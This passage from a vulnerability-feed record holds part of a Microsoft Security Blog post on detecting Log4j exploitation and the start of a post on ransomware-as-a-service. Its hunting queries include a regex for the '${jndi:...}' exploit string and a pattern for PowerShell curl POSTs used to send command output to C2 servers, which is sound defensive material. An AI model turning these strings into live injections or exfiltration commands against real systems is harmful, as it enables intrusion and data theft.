vulnerability on your network and should be immediately investigated and remediated. These alerts are supported on both Windows and Linux platforms: \n\n * **Log4j exploitation detected** \u2013 detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability\n * **Log4j exploitation artifacts detected** (previously titled Possible exploitation of CVE-2021-44228) \u2013 detects coin miners, shells, backdoor, and payloads such as Cobalt Strike used by attackers post-exploitation\n * **Log4j exploitation network artifacts detected** (previously titled Network connection seen in CVE-2021-44228 exploitation) - detects network traffic connecting traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity \n\nThe following alerts may indicate exploitation attempts or testing/scanning activity. Microsoft advises customers to investigate with caution, as these alerts don\u2019t necessarily indicate successful exploitation:\n\n * **Possible target of Log4j exploitation - **detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __received by__ this device\n * **Possible target of Log4j vulnerability scanning** \u2013 detects a possible __attempt to scan__ for the remote code execution vulnerability in a Log4j component of an Apache server in communication received by this device\n * **Possible source of Log4j exploitation** \u2013 detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __initiated from__ this device \n * **Possible Log4j exploitation** - detects multiple behaviors, including suspicious command launch post-exploitation\n * **Possible Log4j exploitation (CVE-2021-44228)** \u2013 inactive, initially covered several of the above, now replaced with more specific titles\n\nThe following alerts detect activities that have been observed in attacks that utilize at least one of the Log4j vulnerabilities. However, these alerts can also indicate activity that is not related to the vulnerability. We are listing them here, as it is highly recommended that they are triaged and remediated immediately given their severity and the potential that they could be related to Log4j exploitation:\n\n * Suspicious remote PowerShell execution \n * Download of file associated with digital currency mining \n * Process associated with digital currency mining \n * Cobalt Strike command and control detected \n * Suspicious network traffic connection to C2 Server \n * Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike) \n\nSome of the alerts mentioned above utilize the enhanced network inspection capabilities in Microsoft Defender for Endpoint. These alerts correlate several network and endpoint signals into high-confidence detection of successful exploitation, as well as providing detailed evidence artifacts valuable for triage and investigation of detected activities.\n\n\n\n_Figure 14. Example detection leveraging network inspection provides details about the Java class returned following successful exploitation_\n\n#### Microsoft Defender for Cloud Apps (previously Microsoft Cloud App Security)\n\nMicrosoft 365 Defender detects exploitation patterns in different data sources, including cloud application traffic reported by Microsoft Defender for Cloud Apps. The following alert surfaces exploitation attempts via cloud applications that use vulnerable Log4j components:\n\n * Log4j exploitation attempt via cloud application (previously titled Exploitation attempt against Log4j (CVE-2021-44228))\n\n\n\n_Figure 15. Microsoft 365 Defender alert &quot;Exploitation attempt against Log4j (CVE-2021-4428)&quot;_\n\n#### Microsoft Defender for Office 365\n\nTo add a layer of protection against exploits that may be delivered via email, Microsoft Defender for Office 365 flags suspicious emails (e.g., emails with the \u201cjndi\u201d string in email headers or the sender email address field), which are moved to the Junk folder.\n\nWe also added the following new alert, which detects attempts to exploit CVE-2021-44228 through email headers:\n\n * Log4j exploitation attempt via email (previously titled Log4j Exploitation Attempt \u2013 Email Headers (CVE-2021-44228))\n\n\n\n_Figure 16. __Sample alert on malicious sender display name found in email correspondence_\n\nThis detection looks for exploitation attempts in email headers, such as the sender display name, sender, and recipient addresses. The alert covers known obfuscation attempts that have been observed in the wild. If this alert is surfaced, customers are recommended to evaluate the source address, email subject, and file attachments to get more context regarding the authenticity of the email.\n\n\n\n_Figure 17. Sample email with malicious sender display name_\n\nIn addition, this email event as can be surfaced via advanced hunting:\n\n\n\n_Figure 18. Sample email event surfaced via advanced hunting _\n\n#### Microsoft 365 Defender advanced hunting queries\n\nTo locate possible exploitation activity, run the following queries:\n\n**Possible malicious indicators in cloud application events**\n\nThis query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application or Account name. The hits returned from this query are most likely unsuccessful attempts, however the results can be useful to identity attackers\u2019 details such as IP address, Payload string, Download URL, etc. \n \n \n CloudAppEvents\n | where Timestamp > datetime(\"2021-12-09\")\n | where UserAgent contains \"jndi:\" \n or AccountDisplayName contains \"jndi:\"\n or Application contains \"jndi:\"\n or AdditionalFields contains \"jndi:\"\n | project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields\n\n**Alerts related to Log4j vulnerability**\n\nThis query looks for alert activity pertaining to the Log4j vulnerability.\n \n \n AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation',\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt\n )\n\n**Devices with Log4j vulnerability alerts and additional other alert-related context**\n\nThis query surfaces devices with Log4j-related alerts and adds additional context from other alerts on the device. \n \n \n // Get any devices with Log4J related Alert Activity\n let DevicesLog4JAlerts = AlertInfo\n | where Title in~('Suspicious script launched',\n 'Exploitation attempt against Log4j (CVE-2021-44228)',\n 'Suspicious process executed by a network service',\n 'Possible target of Log4j exploitation (CVE-2021-44228)',\n 'Possible target of Log4j exploitation',\n 'Possible Log4j exploitation',\n 'Network connection seen in CVE-2021-44228 exploitation',\n 'Log4j exploitation detected',\n 'Possible exploitation of CVE-2021-44228',\n 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',\n 'Possible source of Log4j exploitation'\n 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j\n 'Log4j exploitation attempt via email' // Previouskly titled Log4j Exploitation Attempt\n )\n // Join in evidence information\n | join AlertEvidence on AlertId\n | where DeviceId != \"\"\n | summarize by DeviceId, Title;\n // Get additional alert activity for each device\n AlertEvidence\n | where DeviceId in(DevicesLog4JAlerts)\n // Add additional info\n | join kind=leftouter AlertInfo on AlertId\n | summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)\n\n**Suspected exploitation of Log4j vulnerability**\n\nThis query looks for exploitation of the vulnerability using known parameters in the malicious string. It surfaces exploitation but may surface legitimate behavior in some environments.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')\n //Removing FPs \n | where not(ProcessCommandLine has_any('stackstorm', 'homebrew')) \n\n**Regex to identify malicious exploit string**\n\nThis query looks for the malicious string needed to exploit this vulnerability.\n \n \n DeviceProcessEvents\n | where ProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}' \n or InitiatingProcessCommandLine matches regex @'(?i)\\$\\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\\/\\/(\\$\\{([a-z]){1,20}:([a-z]){1,20}\\})?(([a-zA-Z0-9]|-){2,100})?(\\.([a-zA-Z0-9]|-){2,100})?\\.([a-zA-Z0-9]|-){2,100}\\.([a-z0-9]){2,20}(\\/).*}'\n\n**Suspicious process event creation from VMWare Horizon TomcatService**\n\nThis query identifies anomalous child processes from the _ws_TomcatService.exe_ process associated with the exploitation of the Log4j vulnerability in VMWare Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName has \"ws_TomcatService.exe\"\n | where FileName != \"repadmin.exe\"\n\n**Suspicious JScript staging comment**\n\nThis query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has \"VMBlastSG\"\n \n\n**Suspicious PowerShell curl flags**\n\nThis query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. If the event is a true positive, the contents of the \u201cBody\u201d argument are Base64-encoded results from an attacker-issued comment. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.\n \n \n DeviceProcessEvents\n | where FileName has \"powershell.exe\"\n | where ProcessCommandLine has_all(\"-met\", \"POST\", \"-Body\")\n\n### Microsoft Defender for Cloud\n\nMicrosoft Defender for Cloud\u2019s threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:\n\nOn Windows:\n\n * Detected obfuscated command line\n * Suspicious use of PowerShell detected\n\nOn Linux:\n\n * Suspicious file download\n * Possible Cryptocoinminer download detected\n * Process associated with digital currency mining detected\n * Potential crypto coin miner started\n * A history file has been cleared\n * Suspicious Shell Script Detected\n * Suspicious domain name reference\n * Digital currency mining related behavior detected\n * Behavior similar to common Linux bots detected\n\n### Microsoft Defender for IoT\n\nMicrosoft Defender for IoT has released a dedicated threat Intelligence update package for detecting Log4j 2 exploit attempts on the network (example below). \n\n\n\n_Figure 19. Microsoft Defender for IoT alert_ \n\nThe package is available for download from the [Microsoft Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Getting_Started>) (Click _Updates_, then _Download file _(MD5: 4fbc673742b9ca51a9721c682f404c41). \n\n\n\n_Figure 20. Microsoft Defender for IoT sensor threat intelligence update_\n\nMicrosoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release, [click here ](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes>)for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.\n\nWorking with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the [Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites>) by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the [documentation](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-work-with-threat-intelligence-packages>).\n\n### Microsoft Sentinel\n\nA new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel specific content to monitor, detect, and investigate signals related to exploitation of the CVE-2021-44228 vulnerability.\n\n\n\n_Figure 21. Log4j Vulnerability Detection solution in Microsoft Sentinel_\n\nTo deploy this solution, in the Microsoft Sentinel portal, select **Content hub (Preview)** under **Content Management**, then search for **Log4j** in the search bar. Select the **Log4j vulnerability detection** solution, and click **Install**. Learn how to [centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions](<https://docs.microsoft.com/azure/sentinel/sentinel-solutions-deploy>).\n\n\n\n_Figure 22. Microsoft Sentinel Analytics showing detected Log4j vulnerability_\n\nNote: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.\n\n#### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection queries to look for this activity:\n\n * [Possible exploitation of Apache Log4j component detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml>)\n\nThis hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.\n\n * [Cryptocurrency miners EXECVE](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/CryptoCurrencyMiners.yaml>)\n\nThis query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.\n\n * [Azure WAF Log4j CVE-2021-44228 hunting](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/AzureDiagnostics/WAF_log4j_vulnerability.yaml>)\n\nThis hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving Log4j vulnerability.\n\n * [Log4j vulnerability exploit aka Log4Shell IP IOC](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)\n\nThis hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.\n\n * [Suspicious shell script detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Suspicious_ShellScript_Activity.yaml>)\n\nThis hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.\n\n * [Azure WAF matching for ](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[ Log4j vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)\n\nThis query alerts on a positive pattern match by Azure WAF for CVE-2021-44228 Log4j exploitation attempt. If possible, it then decodes the malicious command for further analysis.\n\n * [Suspicious Base64 download activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Base64_Download_Activity.yaml>)\n\nThis hunting query helps detect suspicious encoded Base64 obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used to the Log4j vulnerability in order to evade detection and stay persistent in the network.\n\n * _[Linux security-related process termination activity detected ](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Process_Termination_Activity.yaml>)_\n\nThis query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise as seen recently to exploit the CVE-2021-44228 vulnerability.\n\n * [Suspicious manipulation of firewall detected via Syslog data](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Firewall_Disable_Activity.yaml>)\n\nThis query uses syslog data to alert on any suspicious manipulation of firewall to evade defenses. Attackers often perform such operations as seen recently to exploit the CVE-2021-44228 vulnerability for C2 communications or exfiltration.\n\n * [User agent search for Log4j exploitation attempt](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/UserAgentSearch_log4j.yaml>)\n\nThis query uses various log sources having user agent data to look for CVE-2021-44228 exploitation attempt based on user agent pattern.\n\n * [Network connections to LDAP port for CVE-2021-44228 vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NetworkConnectionldap_log4j.yaml>)\n\nThis hunting query looks for connection to LDAP port to find possible exploitation attempts for CVE-2021-44228.\n\n * [Linux toolkit detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Linux_Toolkit_Detected.yaml>)\n\nThis query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability\n\n * [Container miner activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Container_Miner_Activity.yaml>)\n\nThis query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining.\n\n * [Network connection to new external LDAP server](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/NetworkConnectionToNewExternalLDAPServer.yaml>)\n\nThis query looks for outbound network connections using the LDAP protocol to external IP addresses, where that IP address has not had an LDAP network connection to it in the 14 days preceding the query timeframe. This could indicate someone exploiting a vulnerability such as CVE-2021-44228 to trigger the connection to a malicious LDAP server.\n\n### Azure Firewall Premium \n\nCustomers using Azure Firewall Premium have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit. Azure Firewall premium IDPS (Intrusion Detection and Prevention System) provides IDPS inspection for all east-west traffic and outbound traffic to internet. The vulnerability rulesets are continuously updated and include CVE-2021-44228 vulnerability for different scenarios including UDP, TCP, HTTP/S protocols since December 10th, 2021. Below screenshot shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\n**Recommendation:** Customers are recommended to configure [Azure Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>) with both IDPS Alert &amp; Deny mode and TLS inspection enabled for proactive protection against **CVE-2021-44228** exploit. \n\n\n\n_Figure 23. Azure Firewall Premium portal_\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>). Customers new to Azure Firewall premium can learn more about [Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-features>).\n\n### Azure Web Application Firewall (WAF)\n\nIn response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0/1.1 available for Azure Front Door global deployments, and OWASP ModSecurity Core Rule Set (CRS) version 3.0/3.1 available for Azure Application Gateway V2 regional deployments.\n\nTo help detect and mitigate the Log2Shell vulnerability by inspecting requests\u2019 headers, URI, and body, we have released the following:\n\n * For Azure Front Door deployments, we have updated the rule **944240 \u201cRemote Command Execution\u201d** under Managed Rules\n * For Azure Application Gateway V2 regional deployments, we have introduced a new rule **Known-CVEs/800100** in the rule group Known-CVEs under Managed Rules\n\nThese rules are already enabled by default in block mode for all existing WAF Default Rule Set (DRS) 1.0/1.1 and OWASP ModSecurity Core Rule Set (CRS) 3.0/3.1 configurations. Customers using WAF Managed Rules would have already received enhanced protection for Log4j 2 vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) and [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)); no additional action is needed.\n\n**Recommendation**: Customers are recommended to enable WAF policy with Default Rule Set 1.0/1.1 on their Front Door deployments, or with OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1 on Application Gateway V2 to immediately enable protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1 or CRS 3.0/3.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.\n\n\n\n_Figure 24. Remote Code Execution rule for Default Rule Set (DRS) versions 1.0/1.1 _\n\n\n\n_Figure 25. Remote Code Execution rule for OWASP ModSecurity Core Rule Set (CRS) version 3.1_\n\nNote: The above protection is also available on Default Rule Set (DRS) 2.0 preview version and OWASP ModSecurity Core Rule Set (CRS) 3.2 preview version, which are available on Azure Front Door Premium and Azure Application Gateway V2 respectively. Customers using Azure CDN Standard from Microsoft can also turn on the above protection by enabling DRS 1.0.\n\nMore information about Managed Rules and Default Rule Set (DRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). More information about Managed Rules and OWASP ModSecurity Core Rule Set (CRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules>).\n\n## Indicators of compromise (IOCs)\n\nMicrosoft Threat Intelligence Center (MSTIC) has provided a list of IOCs related to this attack and will update them with new indicators as they are discovered: [](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)[https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample Data/Feeds/Log4j_IOC_List.csv](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Log4j_IOC_List.csv>)\n\nMicrosoft will continue to monitor this dynamic situation and will update this blog as new threat intelligence and detections/mitigations become available.\n\n#### Revision history\n\n**_[01/19/2022] _**_New information about an unrelated vulnerability we discovered while investigating Log4j attacks_\n\n_**[01/11/2022]** New threat and vulnerability management capabilities to apply mitigation directly from the portal, as well as new advanced hunting queries _\n\n_**[01/10/2022] **Added new information about a China-based ransomware operator targeting internet-facing systems and deploying the NightSky ransomware_\n\n**_[01/07/2022] _**_Added a new rule group in _Azure Web Application Firewall (WAF)_ _\n\n**_[12/27/2021] _**_New capabilities in __threat and vulnerability management__ including a new advanced hunting schema and support for Linux, which requires updating the Microsoft Defender for Linux client; new Microsoft Defender for Containers solution._\n\n_**[12/22/2021]** Added new protections across Microsoft 365 Defender, including Microsoft Defender for Office 365._\n\n_**[12/21/2021]**_ _Added a note on testing services and assumed benign activity and additional guidance to use the **Need help?** button in the Microsoft 365 Defender portal._\n\n**_[12/17/2021] _**_New updates to observed activity, including more information about limited ransomware attacks and additional payloads; additional updates to protections from Microsoft 365 Defender and Azure Web Application Firewall (WAF), and new Microsoft Sentinel queries._\n\n_**[12/16/2021] **New Microsoft Sentinel solution and additional Microsoft Defender for Endpoint detections._\n\n_**[12/15/2021] **Details _about ransomware attacks on non-Microsoft hosted Minecraft servers, as well as updates to product guidance, including threat and vulnerability management._ _\n\n_**[12/14/2021] **New insights about multiple threat actors taking advantage of this vulnerability, _including nation-state actors and access brokers linked to ransomware._ _\n\nThe post [Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T05:29:03", "type": "mmpc", "title": "Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-35247", "CVE-2021-44228", "CVE-2021-4428", "CVE-2021-44428", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-12T05:29:03", "id": "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "href": "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T16:00:24", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2018t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for 